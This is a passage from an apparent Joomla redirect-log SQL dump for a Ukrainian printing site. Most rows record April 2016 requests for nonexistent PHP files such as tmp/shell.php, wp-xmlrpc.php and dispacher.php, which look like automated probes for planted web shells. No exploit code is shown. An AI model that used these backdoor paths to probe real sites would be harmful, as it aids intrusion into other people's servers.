00:00:00',301),(1004,'http://ekvatorprint.com.ua/components/com_weblinks/views/categories/tmpl/thumbs.php','','http://ekvatorprint.com.ua/components/com_weblinks/views/categories/tmpl/thumbs.php','',1,0,'2016-04-26 17:15:37','0000-00-00 00:00:00',301),(1005,'http://ekvatorprint.com.ua/libraries/phpass/dispacher.php','','http://ekvatorprint.com.ua/libraries/phpass/dispacher.php','',1,0,'2016-04-26 17:15:37','0000-00-00 00:00:00',301),(1006,'http://ekvatorprint.com.ua/components/com_media/wpconfig-new.php','','http://ekvatorprint.com.ua/components/com_media/wpconfig-new.php','',1,0,'2016-04-26 17:15:37','0000-00-00 00:00:00',301),(1007,'http://ekvatorprint.com.ua/components/com_content/models/wp-error.php','','http://ekvatorprint.com.ua/components/com_content/models/wp-error.php','',1,0,'2016-04-26 17:15:38','0000-00-00 00:00:00',301),(1008,'http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/themes/advanced/skins/default/img/ppl.php','','http://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/themes/advanced/skins/default/img/ppl.php','',1,0,'2016-04-26 17:15:38','0000-00-00 00:00:00',301),(1009,'http://ekvatorprint.com.ua/components/com_jce/editor/extensions/popups/thumbs.php','','http://ekvatorprint.com.ua/components/com_jce/editor/extensions/popups/thumbs.php','',1,0,'2016-04-26 17:15:38','0000-00-00 00:00:00',301),(1010,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/highcontrast/class.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/highcontrast/class.php','',1,0,'2016-04-26 17:15:38','0000-00-00 00:00:00',301),(1011,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/class.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/class.php','',1,0,'2016-04-26 17:15:57','0000-00-00 00:00:00',301),(1012,'http://ekvatorprint.com.ua/modules/mod_custom/12345.php','','http://ekvatorprint.com.ua/modules/mod_custom/12345.php','',1,0,'2016-04-26 17:15:57','0000-00-00 00:00:00',301),(1013,'http://ekvatorprint.com.ua/modules/mod_k2_content/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_k2_content/dispacher.php','',1,0,'2016-04-26 17:15:58','0000-00-00 00:00:00',301),(1014,'http://ekvatorprint.com.ua/modules/mod_articless/ccs/llink.php','','http://ekvatorprint.com.ua/modules/mod_articless/ccs/llink.php','',1,0,'2016-04-26 17:15:58','0000-00-00 00:00:00',301),(1015,'http://ekvatorprint.com.ua/modules/mod_articles/ups.php','','http://ekvatorprint.com.ua/modules/mod_articles/ups.php','',1,0,'2016-04-26 17:15:58','0000-00-00 00:00:00',301),(1016,'http://ekvatorprint.com.ua/media/system/wp-xmlrpc.php','','http://ekvatorprint.com.ua/media/system/wp-xmlrpc.php','',1,0,'2016-04-26 17:15:59','0000-00-00 00:00:00',301),(1017,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/ws.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/ws.php','',1,0,'2016-04-26 17:15:59','0000-00-00 00:00:00',301),(1018,'http://ekvatorprint.com.ua/modules/mod_articless/times/llink.php','','http://ekvatorprint.com.ua/modules/mod_articless/times/llink.php','',1,0,'2016-04-26 17:15:59','0000-00-00 00:00:00',301),(1019,'http://ekvatorprint.com.ua/modules/mod_articles_categories/wp-xmlrpc.php','','http://ekvatorprint.com.ua/modules/mod_articles_categories/wp-xmlrpc.php','',1,0,'2016-04-26 17:15:59','0000-00-00 00:00:00',301),(1020,'http://ekvatorprint.com.ua/modules/bidsa/bidsa.php','','http://ekvatorprint.com.ua/modules/bidsa/bidsa.php','',1,0,'2016-04-26 17:16:00','0000-00-00 00:00:00',301),(1021,'http://ekvatorprint.com.ua/modules/mod_related_items/wpconfig-new.php','','http://ekvatorprint.com.ua/modules/mod_related_items/wpconfig-new.php','',1,0,'2016-04-26 17:16:00','0000-00-00 00:00:00',301),(1022,'http://ekvatorprint.com.ua/modules/mod_menu/wpconfig-new.php','','http://ekvatorprint.com.ua/modules/mod_menu/wpconfig-new.php','',1,0,'2016-04-26 17:16:00','0000-00-00 00:00:00',301),(1023,'http://ekvatorprint.com.ua/modules/mod.php','','http://ekvatorprint.com.ua/modules/mod.php','',4,0,'2016-04-26 17:16:00','0000-00-00 00:00:00',301),(1024,'http://ekvatorprint.com.ua/media/widgetkit/widgets/gallery/js/thumbs.php','','http://ekvatorprint.com.ua/media/widgetkit/widgets/gallery/js/thumbs.php','',1,0,'2016-04-26 17:16:01','0000-00-00 00:00:00',301),(1025,'http://ekvatorprint.com.ua/modules/mod_syndicate/maink.php','','http://ekvatorprint.com.ua/modules/mod_syndicate/maink.php','',1,0,'2016-04-26 17:16:01','0000-00-00 00:00:00',301),(1026,'http://ekvatorprint.com.ua/plugins/captcha/wp-xmlrpc.php','','http://ekvatorprint.com.ua/plugins/captcha/wp-xmlrpc.php','',1,0,'2016-04-26 17:16:20','0000-00-00 00:00:00',301),(1027,'http://ekvatorprint.com.ua/modules/wwm.php','','http://ekvatorprint.com.ua/modules/wwm.php','',1,0,'2016-04-26 17:16:20','0000-00-00 00:00:00',301),(1028,'http://ekvatorprint.com.ua/plugins/finder/contacts/uplo.php','','http://ekvatorprint.com.ua/plugins/finder/contacts/uplo.php','',1,0,'2016-04-26 17:16:20','0000-00-00 00:00:00',301),(1029,'http://ekvatorprint.com.ua/plugins/finder/wp-xmlrpc.php','','http://ekvatorprint.com.ua/plugins/finder/wp-xmlrpc.php','',1,0,'2016-04-26 17:16:20','0000-00-00 00:00:00',301),(1030,'http://ekvatorprint.com.ua/plugins/editors-xtd/maink.php','','http://ekvatorprint.com.ua/plugins/editors-xtd/maink.php','',1,0,'2016-04-26 17:16:21','0000-00-00 00:00:00',301),(1031,'http://ekvatorprint.com.ua/modules/mod_whosonline/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_whosonline/dispacher.php','',1,0,'2016-04-26 17:16:21','0000-00-00 00:00:00',301),(1032,'http://ekvatorprint.com.ua/modules/mod_weblinks/wp-xmlrpc.php','','http://ekvatorprint.com.ua/modules/mod_weblinks/wp-xmlrpc.php','',1,0,'2016-04-26 17:16:22','0000-00-00 00:00:00',301),(1033,'http://ekvatorprint.com.ua/plugins/editors/wp-xmlrpc.php','','http://ekvatorprint.com.ua/plugins/editors/wp-xmlrpc.php','',1,0,'2016-04-26 17:16:22','0000-00-00 00:00:00',301),(1034,'http://ekvatorprint.com.ua/plugins/content/jw_allvideos/jw_allvideos/includes/js/mediaplayer/skins/bekle/display/class.php','','http://ekvatorprint.com.ua/plugins/content/jw_allvideos/jw_allvideos/includes/js/mediaplayer/skins/bekle/display/class.php','',1,0,'2016-04-26 17:16:22','0000-00-00 00:00:00',301),(1035,'http://ekvatorprint.com.ua/plugins/content/jw_allvideos/jw_allvideos/includes/js/mediaplayer/skins/bekle/controlbar/class.php','','http://ekvatorprint.com.ua/plugins/content/jw_allvideos/jw_allvideos/includes/js/mediaplayer/skins/bekle/controlbar/class.php','',1,0,'2016-04-26 17:16:22','0000-00-00 00:00:00',301),(1036,'http://ekvatorprint.com.ua/modules/mod_weblinks/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_weblinks/dispacher.php','',1,0,'2016-04-26 17:16:22','0000-00-00 00:00:00',301),(1037,'http://ekvatorprint.com.ua/plugins/editors/dispacher.php','','http://ekvatorprint.com.ua/plugins/editors/dispacher.php','',1,0,'2016-04-26 17:16:22','0000-00-00 00:00:00',301),(1038,'http://ekvatorprint.com.ua/plugins/editors/tinymce/secure.php','','http://ekvatorprint.com.ua/plugins/editors/tinymce/secure.php','',1,0,'2016-04-26 17:16:22','0000-00-00 00:00:00',301),(1039,'http://ekvatorprint.com.ua/plugins/editors/jckeditor/plugins/jfilebrowser/core/connector/php/php5/commandhandler/404.php','','http://ekvatorprint.com.ua/plugins/editors/jckeditor/plugins/jfilebrowser/core/connector/php/php5/commandhandler/404.php','',1,0,'2016-04-26 17:16:22','0000-00-00 00:00:00',301),(1040,'http://ekvatorprint.com.ua/plugins/editors/jce/tiny_mce/themes/advanced/skins/dialog/clearlooks2/img/core.php','','http://ekvatorprint.com.ua/plugins/editors/jce/tiny_mce/themes/advanced/skins/dialog/clearlooks2/img/core.php','',1,0,'2016-04-26 17:16:22','0000-00-00 00:00:00',301),(1041,'http://ekvatorprint.com.ua/plugins/system/helix/html/com_weblinks/backup.php','','http://ekvatorprint.com.ua/plugins/system/helix/html/com_weblinks/backup.php','',1,0,'2016-04-26 17:16:55','0000-00-00 00:00:00',301),(1042,'http://ekvatorprint.com.ua/plugins/jmonitoring/akeebabackup/backup.php','','http://ekvatorprint.com.ua/plugins/jmonitoring/akeebabackup/backup.php','',1,0,'2016-04-26 17:16:55','0000-00-00 00:00:00',301),(1043,'http://ekvatorprint.com.ua/plugins/vmshipment/dispacher.php','','http://ekvatorprint.com.ua/plugins/vmshipment/dispacher.php','',1,0,'2016-04-26 17:16:55','0000-00-00 00:00:00',301),(1044,'http://ekvatorprint.com.ua/plugins/system/system.php','','http://ekvatorprint.com.ua/plugins/system/system.php','',2,0,'2016-04-26 17:16:55','0000-00-00 00:00:00',301),(1045,'http://ekvatorprint.com.ua/plugins/system/highlight/wp-error.php','','http://ekvatorprint.com.ua/plugins/system/highlight/wp-error.php','',1,0,'2016-04-26 17:16:55','0000-00-00 00:00:00',301),(1046,'http://ekvatorprint.com.ua/tmp/was-wp.php','','http://ekvatorprint.com.ua/tmp/was-wp.php','',1,0,'2016-04-26 17:16:55','0000-00-00 00:00:00',301),(1047,'http://ekvatorprint.com.ua/plugins/user/profile/yjj.php','','http://ekvatorprint.com.ua/plugins/user/profile/yjj.php','',1,0,'2016-04-26 17:16:56','0000-00-00 00:00:00',301),(1048,'http://ekvatorprint.com.ua/plugins/user/joomla/wp-error.php','','http://ekvatorprint.com.ua/plugins/user/joomla/wp-error.php','',1,0,'2016-04-26 17:16:56','0000-00-00 00:00:00',301),(1049,'http://ekvatorprint.com.ua/templates/atomic/html/mod_menu/main.php','','http://ekvatorprint.com.ua/templates/atomic/html/mod_menu/main.php','',1,0,'2016-04-26 17:16:56','0000-00-00 00:00:00',301),(1050,'http://ekvatorprint.com.ua/templates/atomic/shwso.php','','http://ekvatorprint.com.ua/templates/atomic/shwso.php','',1,0,'2016-04-26 17:16:56','0000-00-00 00:00:00',301),(1051,'http://ekvatorprint.com.ua/templates/atomic/css/blueprint/main.php','','http://ekvatorprint.com.ua/templates/atomic/css/blueprint/main.php','',1,0,'2016-04-26 17:16:56','0000-00-00 00:00:00',301),(1052,'http://ekvatorprint.com.ua/components/com_content/models/secure.php','','http://ekvatorprint.com.ua/components/com_content/models/secure.php','',1,0,'2016-04-26 17:18:50','0000-00-00 00:00:00',301),(1053,'http://ekvatorprint.com.ua/administrator/class.php','','http://ekvatorprint.com.ua/administrator/class.php','',1,0,'2016-04-26 17:18:50','0000-00-00 00:00:00',301),(1054,'http://ekvatorprint.com.ua/components/com_mailto/dispacher.php','','http://ekvatorprint.com.ua/components/com_mailto/dispacher.php','',1,0,'2016-04-26 17:18:51','0000-00-00 00:00:00',301),(1055,'http://ekvatorprint.com.ua/components/com_users/wp-xmlrpc.php','','http://ekvatorprint.com.ua/components/com_users/wp-xmlrpc.php','',1,0,'2016-04-26 17:18:51','0000-00-00 00:00:00',301),(1056,'http://ekvatorprint.com.ua/components/com_finder/models/wp-error.php','','http://ekvatorprint.com.ua/components/com_finder/models/wp-error.php','',1,0,'2016-04-26 17:18:51','0000-00-00 00:00:00',301),(1057,'http://ekvatorprint.com.ua/components/com_users/helpers/wp-error.php','','http://ekvatorprint.com.ua/components/com_users/helpers/wp-error.php','',1,0,'2016-04-26 17:18:51','0000-00-00 00:00:00',301),(1058,'http://ekvatorprint.com.ua/components/com_banners/dispacher.php','','http://ekvatorprint.com.ua/components/com_banners/dispacher.php','',1,0,'2016-04-26 17:18:51','0000-00-00 00:00:00',301),(1059,'http://ekvatorprint.com.ua/administrator/templates/khepri/secure.php','','http://ekvatorprint.com.ua/administrator/templates/khepri/secure.php','',1,0,'2016-04-26 17:18:52','0000-00-00 00:00:00',301),(1060,'http://ekvatorprint.com.ua/images/banners/dispacher.php','','http://ekvatorprint.com.ua/images/banners/dispacher.php','',1,0,'2016-04-26 17:18:52','0000-00-00 00:00:00',301),(1061,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_cache/thumbs.php','','http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_cache/thumbs.php','',1,0,'2016-04-26 17:18:52','0000-00-00 00:00:00',301),(1062,'http://ekvatorprint.com.ua/components/com_newsfeeds/models/wp-error.php','','http://ekvatorprint.com.ua/components/com_newsfeeds/models/wp-error.php','',1,0,'2016-04-26 17:18:52','0000-00-00 00:00:00',301),(1063,'http://ekvatorprint.com.ua/libraries/joomla/updater/wp-error.php','','http://ekvatorprint.com.ua/libraries/joomla/updater/wp-error.php','',1,0,'2016-04-26 17:19:16','0000-00-00 00:00:00',301),(1064,'http://ekvatorprint.com.ua/images/configurs.simplez.php','','http://ekvatorprint.com.ua/images/configurs.simplez.php','',1,0,'2016-04-26 17:19:17','0000-00-00 00:00:00',301),(1065,'http://ekvatorprint.com.ua/modules/mod_araticlhess/license.php','','http://ekvatorprint.com.ua/modules/mod_araticlhess/license.php','',1,0,'2016-04-26 17:19:17','0000-00-00 00:00:00',301),(1066,'http://ekvatorprint.com.ua/media/widgetkit/widgets/map/js/thumbs.php','','http://ekvatorprint.com.ua/media/widgetkit/widgets/map/js/thumbs.php','',1,0,'2016-04-26 17:19:18','0000-00-00 00:00:00',301),(1067,'http://ekvatorprint.com.ua/libraries/joomla/language/wp-error.php','','http://ekvatorprint.com.ua/libraries/joomla/language/wp-error.php','',1,0,'2016-04-26 17:19:18','0000-00-00 00:00:00',301),(1068,'http://ekvatorprint.com.ua/language/ru-ru/wpconfig-new.php','','http://ekvatorprint.com.ua/language/ru-ru/wpconfig-new.php','',1,0,'2016-04-26 17:19:18','0000-00-00 00:00:00',301),(1069,'http://ekvatorprint.com.ua/media/editors/dispacher.php','','http://ekvatorprint.com.ua/media/editors/dispacher.php','',1,0,'2016-04-26 17:19:19','0000-00-00 00:00:00',301),(1070,'http://ekvatorprint.com.ua/images/sampledata/wpconfig-new.php','','http://ekvatorprint.com.ua/images/sampledata/wpconfig-new.php','',1,0,'2016-04-26 17:19:19','0000-00-00 00:00:00',301),(1071,'http://ekvatorprint.com.ua/language/ru-ru/license.php','','http://ekvatorprint.com.ua/language/ru-ru/license.php','',1,0,'2016-04-26 17:19:19','0000-00-00 00:00:00',301),(1072,'http://ekvatorprint.com.ua/images/configurs01.simplez.php','','http://ekvatorprint.com.ua/images/configurs01.simplez.php','',1,0,'2016-04-26 17:19:19','0000-00-00 00:00:00',301),(1073,'http://ekvatorprint.com.ua/libraries/joomla/base/wp-error.php','','http://ekvatorprint.com.ua/libraries/joomla/base/wp-error.php','',1,0,'2016-04-26 17:19:19','0000-00-00 00:00:00',301),(1074,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/default/class.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/default/class.php','',1,0,'2016-04-26 17:19:20','0000-00-00 00:00:00',301),(1075,'http://ekvatorprint.com.ua/media/plg_quickicon_joomlaupdate/wp-xmlrpc.php','','http://ekvatorprint.com.ua/media/plg_quickicon_joomlaupdate/wp-xmlrpc.php','',1,0,'2016-04-26 17:19:20','0000-00-00 00:00:00',301),(1076,'http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/advimage/js/main.php','','http://ekvatorprint.com.ua/media/editors/tinymce/jscripts/tiny_mce/plugins/advimage/js/main.php','',1,0,'2016-04-26 17:19:20','0000-00-00 00:00:00',301),(1077,'http://ekvatorprint.com.ua/libraries/phputf8/mbstring/wp-error.php','','http://ekvatorprint.com.ua/libraries/phputf8/mbstring/wp-error.php','',1,0,'2016-04-26 17:19:20','0000-00-00 00:00:00',301),(1078,'http://ekvatorprint.com.ua/plugins/authentication/ldap/wp-error.php','','http://ekvatorprint.com.ua/plugins/authentication/ldap/wp-error.php','',1,0,'2016-04-26 17:19:33','0000-00-00 00:00:00',301),(1079,'http://ekvatorprint.com.ua/modules/mod_footer/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_footer/dispacher.php','',1,0,'2016-04-26 17:19:33','0000-00-00 00:00:00',301),(1080,'http://ekvatorprint.com.ua/modules/mod_te/mod_te.php','','http://ekvatorprint.com.ua/modules/mod_te/mod_te.php','',4,0,'2016-04-26 17:19:33','0000-00-00 00:00:00',301),(1081,'http://ekvatorprint.com.ua/plugins/authentication/dispacher.php','','http://ekvatorprint.com.ua/plugins/authentication/dispacher.php','',1,0,'2016-04-26 17:19:33','0000-00-00 00:00:00',301),(1082,'http://ekvatorprint.com.ua/modules/mod_articless/404.php','','http://ekvatorprint.com.ua/modules/mod_articless/404.php','',1,0,'2016-04-26 17:19:33','0000-00-00 00:00:00',301),(1083,'http://ekvatorprint.com.ua/modules/mod_kizma/mod_kizma.php','','http://ekvatorprint.com.ua/modules/mod_kizma/mod_kizma.php','',1,0,'2016-04-26 17:19:33','0000-00-00 00:00:00',301),(1084,'http://ekvatorprint.com.ua/modules/mod_random_image/maink.php','','http://ekvatorprint.com.ua/modules/mod_random_image/maink.php','',1,0,'2016-04-26 17:19:33','0000-00-00 00:00:00',301),(1085,'http://ekvatorprint.com.ua/modules/mod_articles_latest/wp-xmlrpc.php','','http://ekvatorprint.com.ua/modules/mod_articles_latest/wp-xmlrpc.php','',1,0,'2016-04-26 17:19:33','0000-00-00 00:00:00',301),(1086,'http://ekvatorprint.com.ua/modules/mod_users_latest/dispacher.php','','http://ekvatorprint.com.ua/modules/mod_users_latest/dispacher.php','',1,0,'2016-04-26 17:19:33','0000-00-00 00:00:00',301),(1087,'http://ekvatorprint.com.ua/modules/mod_articles_archive/sustemesuse.php','','http://ekvatorprint.com.ua/modules/mod_articles_archive/sustemesuse.php','',1,0,'2016-04-26 17:19:33','0000-00-00 00:00:00',301),(1088,'http://ekvatorprint.com.ua/modules/mod_articles_news/wp-xmlrpc.php','','http://ekvatorprint.com.ua/modules/mod_articles_news/wp-xmlrpc.php','',1,0,'2016-04-26 17:19:34','0000-00-00 00:00:00',301),(1089,'http://ekvatorprint.com.ua/modules/mod_wrapper/wp-xmlrpc.php','','http://ekvatorprint.com.ua/modules/mod_wrapper/wp-xmlrpc.php','',1,0,'2016-04-26 17:19:34','0000-00-00 00:00:00',301),(1090,'http://ekvatorprint.com.ua/modules/mod_languages/wp-xmlrpc.php','','http://ekvatorprint.com.ua/modules/mod_languages/wp-xmlrpc.php','',1,0,'2016-04-26 17:19:34','0000-00-00 00:00:00',301),(1091,'http://ekvatorprint.com.ua/modules/mod_banners/wp-xmlrpc.php','','http://ekvatorprint.com.ua/modules/mod_banners/wp-xmlrpc.php','',1,0,'2016-04-26 17:19:34','0000-00-00 00:00:00',301),(1092,'http://ekvatorprint.com.ua/modules/mod_articles_archive/wpconfig-new.php','','http://ekvatorprint.com.ua/modules/mod_articles_archive/wpconfig-new.php','',1,0,'2016-04-26 17:19:34','0000-00-00 00:00:00',301),(1093,'http://ekvatorprint.com.ua/plugins/system/cache/wp-error.php','','http://ekvatorprint.com.ua/plugins/system/cache/wp-error.php','',1,0,'2016-04-26 17:19:55','0000-00-00 00:00:00',301),(1094,'http://ekvatorprint.com.ua/plugins/extension/dispacher.php','','http://ekvatorprint.com.ua/plugins/extension/dispacher.php','',1,0,'2016-04-26 17:19:55','0000-00-00 00:00:00',301),(1095,'http://ekvatorprint.com.ua/plugins/editors/none/wp-error.php','','http://ekvatorprint.com.ua/plugins/editors/none/wp-error.php','',1,0,'2016-04-26 17:19:55','0000-00-00 00:00:00',301),(1096,'http://ekvatorprint.com.ua/tmp/shell.php','','http://ekvatorprint.com.ua/tmp/shell.php','',1,0,'2016-04-26 17:19:55','0000-00-00 00:00:00',301),(1097,'http://ekvatorprint.com.ua/plugins/user/contactcreator/wp-error.php','','http://ekvatorprint.com.ua/plugins/user/contactcreator/wp-error.php','',1,0,'2016-04-26 17:19:55','0000-00-00 00:00:00',301),(1098,'http://ekvatorprint.com.ua/plugins/user/profile/profiles/main.php','','http://ekvatorprint.com.ua/plugins/user/profile/profiles/main.php','',1,0,'2016-04-26 17:19:56','0000-00-00 00:00:00',301),(1099,'http://ekvatorprint.com.ua/plugins/finder/weblinks/wp-error.php','','http://ekvatorprint.com.ua/plugins/finder/weblinks/wp-error.php','',1,0,'2016-04-26 17:19:56','0000-00-00 00:00:00',301),(1100,'http://ekvatorprint.com.ua/plugins/search/wp-xmlrpc.php','','http://ekvatorprint.com.ua/plugins/search/wp-xmlrpc.php','',1,0,'2016-04-26 17:19:56','0000-00-00 00:00:00',301),(1101,'http://ekvatorprint.com.ua/plugins/extension/wp-xmlrpc.php','','http://ekvatorprint.com.ua/plugins/extension/wp-xmlrpc.php','',1,0,'2016-04-26 17:19:56','0000-00-00 00:00:00',301),(1102,'http://ekvatorprint.com.ua/templates/system/images/secure.php','','http://ekvatorprint.com.ua/templates/system/images/secure.php','',1,0,'2016-04-26 17:19:56','0000-00-00 00:00:00',301),(1103,'http://ekvatorprint.com.ua/templates/ja_purity/html/com_content/category/thumbs.php','','http://ekvatorprint.com.ua/templates/ja_purity/html/com_content/category/thumbs.php','',1,0,'2016-04-26 17:19:56','0000-00-00 00:00:00',301),(1104,'http://ekvatorprint.com.ua/images/phocagallery/Fotooboi/thumbs/phoca_thumb_m_Fotooboi-1.jpg','','http://ekvatorprint.com.ua/portfolio','',1,0,'2016-04-26 18:49:08','0000-00-00 00:00:00',301),(1105,'http://ekvatorprint.com.ua/images/phocagallery/Citylights/thumbs/phoca_thumb_m_Citylights-1.jpg','','http://ekvatorprint.com.ua/portfolio','',1,0,'2016-04-26 20:12:44','0000-00-00 00:00:00',301),(1106,'http://ekvatorprint.com.ua/images/phocagallery/Bumaga-bluback/thumbs/phoca_thumb_m_Bumaga-bluback-1.jpg','','http://ekvatorprint.com.ua/portfolio','',1,0,'2016-04-26 22:08:56','0000-00-00 00:00:00',301),(1107,'http://ekvatorprint.com.ua/images/phocagallery/Setki/thumbs/phoca_thumb_m_Setka-1.jpg','','http://ekvatorprint.com.ua/portfolio','',1,0,'2016-04-26 22:24:53','0000-00-00 00:00:00',301),(1108,'http://ekvatorprint.com.ua/images/phocagallery/Kartini/thumbs/phoca_thumb_m_Kartini-1.jpg','','http://ekvatorprint.com.ua/portfolio','',1,0,'2016-04-27 01:38:42','0000-00-00 00:00:00',301),(1109,'http://ekvatorprint.com.ua/administrator/cache/wpconfig-new.php','','http://ekvatorprint.com.ua/administrator/cache/wpconfig-new.php','',1,0,'2016-04-27 09:58:50','0000-00-00 00:00:00',301),(1110,'http://ekvatorprint.com.ua/administrator/components/com_users/views/levels/thumbs.php','','http://ekvatorprint.com.ua/administrator/components/com_users/views/levels/thumbs.php','',1,0,'2016-04-27 09:58:51','0000-00-00 00:00:00',301),(1111,'http://ekvatorprint.com.ua/administrator/components/com_config/views/component/thumbs.php','','http://ekvatorprint.com.ua/administrator/components/com_config/views/component/thumbs.php','',1,0,'2016-04-27 09:58:51','0000-00-00 00:00:00',301),(1112,'http://ekvatorprint.com.ua/administrator/help/dispacher.php','','http://ekvatorprint.com.ua/administrator/help/dispacher.php','',1,0,'2016-04-27 09:59:11','0000-00-00 00:00:00',301),(1113,'http://ekvatorprint.com.ua/administrator/manifests/wpconfig-new.php','','http://ekvatorprint.com.ua/administrator/manifests/wpconfig-new.php','',1,0,'2016-04-27 09:59:11','0000-00-00 00:00:00',301),(1114,'http://ekvatorprint.com.ua/administrator/modules/dispacher.php','','http://ekvatorprint.com.ua/administrator/modules/dispacher.php','',1,0,'2016-04-27 09:59:11','0000-00-00 00:00:00',301),(1115,'http://ekvatorprint.com.ua/administrator/modules.php','','http://ekvatorprint.com.ua/administrator/modules.php','',1,0,'2016-04-27 09:59:12','0000-00-00 00:00:00',301),(1116,'http://ekvatorprint.com.ua/components/com_content/dispacher.php','','http://ekvatorprint.com.ua/components/com_content/dispacher.php','',1,0,'2016-04-27 09:59:12','0000-00-00 00:00:00',301),(1117,'http://ekvatorprint.com.ua/components/com_content/wp-xmlrpc.php','','http://ekvatorprint.com.ua/components/com_content/wp-xmlrpc.php','',1,0,'2016-04-27 09:59:12','0000-00-00 00:00:00',301),(1118,'http://ekvatorprint.com.ua/administrator/components/com_weblinks/views/weblink/thumbs.php','','http://ekvatorprint.com.ua/administrator/components/com_weblinks/views/weblink/thumbs.php','',1,0,'2016-04-27 09:59:12','0000-00-00 00:00:00',301),(1119,'http://ekvatorprint.com.ua/administrator/modules/mod_login/secure.php','','http://ekvatorprint.com.ua/administrator/modules/mod_login/secure.php','',1,0,'2016-04-27 09:59:12','0000-00-00 00:00:00',301),(1120,'http://ekvatorprint.com.ua/components/com_contact/views/wp-error.php','','http://ekvatorprint.com.ua/components/com_contact/views/wp-error.php','',1,0,'2016-04-27 09:59:12','0000-00-00 00:00:00',301),(1121,'http://ekvatorprint.com.ua/administrator/help/en-gb/wp-error.php','','http://ekvatorprint.com.ua/administrator/help/en-gb/wp-error.php','',1,0,'2016-04-27 09:59:12','0000-00-00 00:00:00',301),(1122,'http://ekvatorprint.com.ua/components/com_content/helpers/wp-error.php','','http://ekvatorprint.com.ua/components/com_content/helpers/wp-error.php','',1,0,'2016-04-27 09:59:12','0000-00-00 00:00:00',301),(1123,'http://ekvatorprint.com.ua/components/com_banners/models/secure.php','','http://ekvatorprint.com.ua/components/com_banners/models/secure.php','',1,0,'2016-04-27 09:59:12','0000-00-00 00:00:00',301),(1124,'http://ekvatorprint.com.ua/components/com_contact/views/category/tmpl/thumbs.php','','http://ekvatorprint.com.ua/components/com_contact/views/category/tmpl/thumbs.php','',1,0,'2016-04-27 09:59:12','0000-00-00 00:00:00',301),(1125,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_plugins/thumbs.php','','http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_plugins/thumbs.php','',1,0,'2016-04-27 09:59:12','0000-00-00 00:00:00',301),(1126,'http://ekvatorprint.com.ua/components/com_contact/views/categories/tmpl/sys.php','','http://ekvatorprint.com.ua/components/com_contact/views/categories/tmpl/sys.php','',1,0,'2016-04-27 09:59:13','0000-00-00 00:00:00',301),(1127,'http://ekvatorprint.com.ua/images/antispam_mod.php','','http://ekvatorprint.com.ua/images/antispam_mod.php','',1,0,'2016-04-27 09:59:41','0000-00-00 00:00:00',301),(1128,'http://ekvatorprint.com.ua/components/com_newsfeeds/views/newsfeed/tmpl/thumbs.php','','http://ekvatorprint.com.ua/components/com_newsfeeds/views/newsfeed/tmpl/thumbs.php','',1,0,'2016-04-27 09:59:41','0000-00-00 00:00:00',301),(1129,'http://ekvatorprint.com.ua/components/com_wrapper/dispacher.php','','http://ekvatorprint.com.ua/components/com_wrapper/dispacher.php','',1,0,'2016-04-27 09:59:41','0000-00-00 00:00:00',301),(1130,'http://ekvatorprint.com.ua/components/com_weblinks/helpers/secure.php','','http://ekvatorprint.com.ua/components/com_weblinks/helpers/secure.php','',1,0,'2016-04-27 09:59:41','0000-00-00 00:00:00',301),(1131,'http://ekvatorprint.com.ua/images/css.php','','http://ekvatorprint.com.ua/images/css.php','',3,0,'2016-04-27 09:59:42','0000-00-00 00:00:00',301),(1132,'http://ekvatorprint.com.ua/components/com_users/dispacher.php','','http://ekvatorprint.com.ua/components/com_users/dispacher.php','',1,0,'2016-04-27 09:59:42','0000-00-00 00:00:00',301),(1133,'http://ekvatorprint.com.ua/components/com_wrapper/wp-xmlrpc.php','','http://ekvatorprint.com.ua/components/com_wrapper/wp-xmlrpc.php','',1,0,'2016-04-27 09:59:42','0000-00-00 00:00:00',301),(1134,'http://ekvatorprint.com.ua/components/com_media/wp-xmlrpc.php','','http://ekvatorprint.com.ua/components/com_media/wp-xmlrpc.php','',1,0,'2016-04-27 09:59:42','0000-00-00 00:00:00',301),(1135,'http://ekvatorprint.com.ua/images/comnon.php','','http://ekvatorprint.com.ua/images/comnon.php','',1,0,'2016-04-27 09:59:42','0000-00-00 00:00:00',301),(1136,'http://ekvatorprint.com.ua/images/google_26433648452081.php','','http://ekvatorprint.com.ua/images/google_26433648452081.php','',1,0,'2016-04-27 09:59:42','0000-00-00 00:00:00',301),(1137,'http://ekvatorprint.com.ua/components/com_weblinks/wp-xmlrpc.php','','http://ekvatorprint.com.ua/components/com_weblinks/wp-xmlrpc.php','',1,0,'2016-04-27 09:59:42','0000-00-00 00:00:00',301),(1138,'http://ekvatorprint.com.ua/components/com_wrapper/new.php','','http://ekvatorprint.com.ua/components/com_wrapper/new.php','',1,0,'2016-04-27 09:59:42','0000-00-00 00:00:00',301),(1139,'http://ekvatorprint.com.ua/components/com_mailto/wp-xmlrpc.php','','http://ekvatorprint.com.ua/components/com_mailto/wp-xmlrpc.php','',1,0,'2016-04-27 09:59:42','0000-00-00 00:00:00',301),(1140,'http://ekvatorprint.com.ua/components/com_newsfeeds/dispacher.php','','http://ekvatorprint.com.ua/components/com_newsfeeds/dispacher.php','',1,0,'2016-04-27 09:59:42','0000-00-00 00:00:00',301),(1141,'http://ekvatorprint.com.ua/components/com_mailto/views/mailto/tmpl/thumbs.php','','http://ekvatorprint.com.ua/components/com_mailto/views/mailto/tmpl/thumbs.php','',1,0,'2016-04-27 09:59:42','0000-00-00 